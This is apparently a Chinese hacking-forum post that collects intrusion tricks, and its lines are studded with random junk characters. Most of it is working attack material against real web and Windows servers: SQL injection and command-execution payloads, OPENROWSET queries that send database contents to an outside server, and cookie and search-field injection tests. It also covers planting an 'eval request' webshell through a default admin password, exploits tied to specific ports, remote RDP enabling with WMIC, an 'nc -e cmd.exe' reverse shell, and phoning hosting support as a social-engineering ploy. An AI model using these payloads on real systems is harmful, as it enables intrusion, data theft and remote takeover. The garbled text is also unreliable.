SA点数据库分离技术相关6 E; m$ A) P5 h3 I
6 m7 W) {/ ~ E* S2 z5 ^; F7 X
" d* K! V( W6 V# r( GSA点数据库分离搞法+语句:
, T% y$ h0 J3 t. _7 C: e- {, P* n& r) D6 Q! d# u5 g" A% M
注射点不显错,执行下面三条语句页面都返回正常。
; W; H9 U6 o3 Q% Y$ u& ~) X) band 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
8 [! I+ h Y) k% jand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')! B% Q& q4 m& w/ M6 w9 k4 l! z
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
; }8 _) V i5 D l, C8 Y0 c6 `可以列目录,判断系统为2000,web与数据库分离: t. z9 l5 d& S2 b* T- p
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。) \+ ]$ }1 n6 X1 M
在注射点上执行8 G) N9 G. E7 r1 E% ~) U g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--& o' L x+ b% }) K+ |# |! z' t" }
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP L2 R4 i5 T5 I7 k& s1 M
还有我用NC监听得其他端口都没有得到IP。
! p% ^- p& s- Y2 `4 d8 M: ^1 n) g; u7 H4 R
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。+ R% G% A* s: G) N& n8 \) w
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--4 o) k& u. F- r; u4 ]0 f' H
y" g, m) I+ e;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--' j3 u# h- K2 i0 _* I& y, J8 W
6 y. B% ?, N. ^& |5 Y- q" T现在就猜想是不是数据库是内网而且不能连外网。5 n9 k0 a, J2 `: b& m6 ?# w
2 f* c4 I0 y- l: t% ]. o i" a) H5 L' D. J2 s0 a
access导出txt文本代码
* p5 D. r5 [& |SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
& S8 T$ S4 K# [
* O! P2 |! E. A! f, o. h' I8 C) \7 ?! C4 O# [2 o
3 Z. h" D& \) T; d. N5 Q
自动跳转到指定网站代码头/ A$ \0 P6 ~% S# N @' Z% ^
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
( O2 u* i* ~2 i$ k, V5 o) o! s1 w0 N* }8 B9 q7 f
x8 T# f6 ]$ p$ h$ w5 W I
入侵java or jsp站点时默认配置文件路径:. B6 q) R. V4 \' z/ x; v- d' ?
\web-inf\web.xml
" o W0 Y' ~ G! R2 `' A! rtomcat下的配置文件位置:
! W/ t3 b. q7 L2 ~9 o\conf\server.xml (前面加上tomcat路径)
$ p |8 a6 |. F8 W\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
3 a6 b( a# z) O* q, ]! m; _6 R
* P y5 G f& N! D0 w' s' d
) O/ E. N/ j/ d) q
: B+ n4 G- b. j) q检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:/ p2 C( l8 N. X: U, z
-1%23& F* s1 I: `6 g- i- H: @1 @3 y* D
> 0 _9 m) i: o' ], b
<
' v6 Q, S3 N3 S. |2 ?1'+or+'1'='1+ [3 F: L8 G- X3 L
id=8%bf
4 Q* V) \& X& u8 v; l) c, {7 K. b7 @% E, D/ `3 u
全新注入点检测试法:
! @. H# X$ v8 y4 f% ]在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
6 l4 O: V. J/ G1 u+ X. ^7 E6 J: z( L L* j7 f1 L/ F9 w0 G- |7 Y& k! L
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。9 C. u) P/ s6 O9 G0 w! [1 M# k. r
! d- a7 M9 a9 }5 V! ?5 |9 D4 ^4 P
搜索型注入判断方法:
2 a+ \: h. N1 s- M% M5 p- q, T北京%' and '1'='1' and '%'='% J; z* N7 [+ ~! _
北京%' and '1'='2' and '%'='
% P) Q6 l& y+ O; f7 t' @. U! G7 U; I- m% ]( g
6 s7 z$ b9 r* V, y; o* S/ z! J. K+ ]
COOKIES注入:6 k9 o1 A9 r5 |7 ^3 n7 I
& X( z1 t5 j, I" {" q+ V" Ujavascript:alert(document.cookie="id="+escape("51 and 1=1"));
6 j( S' n5 l+ r( M8 i+ Y! b, o; a/ p$ ], {0 D
2000专业版查看本地登录用户命令:
5 Q- b' X0 L* b) C! tnet config workstation4 ~8 u# y( b0 A, U0 |5 M
9 V+ z7 |0 n f8 R3 [2 u* r. g9 ^) d& f, B6 r0 {' A) w
2003下查看ipsec配置和默认防火墙配置命令:
. n* e8 W5 u( E5 c# x* Inetsh firewall show config7 m3 c) p6 n- d. M
netsh ipsec static show all
# H7 I7 N& a3 t4 R
" K1 N% a1 f" M% ]不指派指定策略命令:/ E. a8 n8 O! A: ]8 _+ |9 R. W
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
/ ]5 _; ~& T2 Inetsh ipsec static show policy all 显示策略名/ f2 a" k' A1 K$ D
" H1 f `9 A1 J5 B; J1 D+ d; U3 Y2 c$ i7 g3 y1 V( v
猜管理员后台小技巧:
; c- [9 {) d0 u% V9 W6 \# e7 w' p$ Gadmin/left.asp
: Y6 `6 Y7 X8 u2 Z$ @admin/main.asp
. q3 l+ _3 F6 v- A2 eadmin/top.asp2 w/ K) Y- i3 H- ?1 u" @3 l7 h d: q6 T
admin/admin.asp
5 v7 t) `$ y% F! A+ j会现出菜单导航,然后迅雷下载全部链接6 f9 \/ ^$ b# r% j' B# c
$ A, m. B9 i7 F4 B+ s( R) b
( g4 b: i7 p6 P5 D社会工程学:7 |8 \% Z/ c7 h- K; n Q( E5 }8 l
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人, w: d4 b: @1 j' } R
然后去骗客服
0 L: N' d: I. y1 n+ W' N- }0 t5 f1 j9 H6 P+ i1 @, K
) K* Q0 q& ^% N/ ?- n! @ c% Y
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: . J6 m$ |7 K) e5 t
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
3 f) u- F6 f* Q6 y8 L' L( H2 S 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
7 G K* \( R, ~" w& a4 z/ L- D! b7 F" X) q9 w' N+ N
]- G5 e/ i: E3 a) K* N- s
$ U0 ~; I$ f/ ^% Y6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
' }: p9 p# }9 M* y; G. v* A+ I3 l q) J$ O' F. }5 q
2 }: V1 h$ V$ z
% d% B3 h6 |5 }5 TCMD加密注册表位置
/ d: O- m7 ~6 T1 E, C% L# E* t(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
i, F$ r9 n; `; j. _: O/ Q' d2 iAutoRun4 L8 \! x% w# g9 c0 U7 m
% Z# O8 Y4 }- s' t& k0 Y9 |(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor1 L5 `- ? m: Y+ b! L2 X
AutoRun
* v5 J& y( ]( y d$ X) b' `3 r, o+ f0 d9 W& w. G
& J3 p& U% C7 ~: F; e8 ?3 c
在找注入时搜索Hidden,把他改成test6 A5 X/ G1 A O; Y
7 z' M" m& y+ M) |0 R6 J
: z2 ^ |7 j0 Y) k
* O0 Q, D& G/ `4 p3 u" ]
mstsc /v:IP /console
' D" Y0 w7 q: `8 ?+ C) l
4 N+ \7 c) L9 H" s! a* g2 Z8 j* u& v% v
一句话开3389:
/ c$ c- H6 b w' d0 v3 g5 h' r9 |7 K0 t, w7 e
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> + ~* E4 ?, {; l; ^. | D
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.1 s: s! n, v4 J) k' Z% I( Q
, U; G$ t& f7 e: y
& Y* n `4 X5 ]) R0 v. T知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
! }: [, L6 j, M4 f" L3 Y8 RInsert into admin(user,pwd) values('test','test')
- ?0 e. U3 W8 a7 s8 R! D& N' Y( y* o+ d! I3 u1 ~! p
: C0 \2 T! O: T+ N( y
NC反弹* [# W/ a, w; v; d! {
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
6 c* D2 z( |8 p. @8 u% ^然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
3 w2 g* ~$ X( }! B7 L/ n/ E$ r8 Y' M! D5 a5 y3 ^8 Q. y
7 @3 r2 {1 O _% r1 f
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题+ U" \6 \$ n3 p: j6 U7 L' e( K" E5 r
4 u9 v+ [" z' c5 a& K0 i2 H
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
4 ^( j: @& {) j* U$ e8 b% s0 s例如:: R; o# |0 L$ }. W a
subst k: d:\www\ 用d盘www目录替代k盘$ H- p$ C" U7 ~: Y; ^' Y# m
subst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对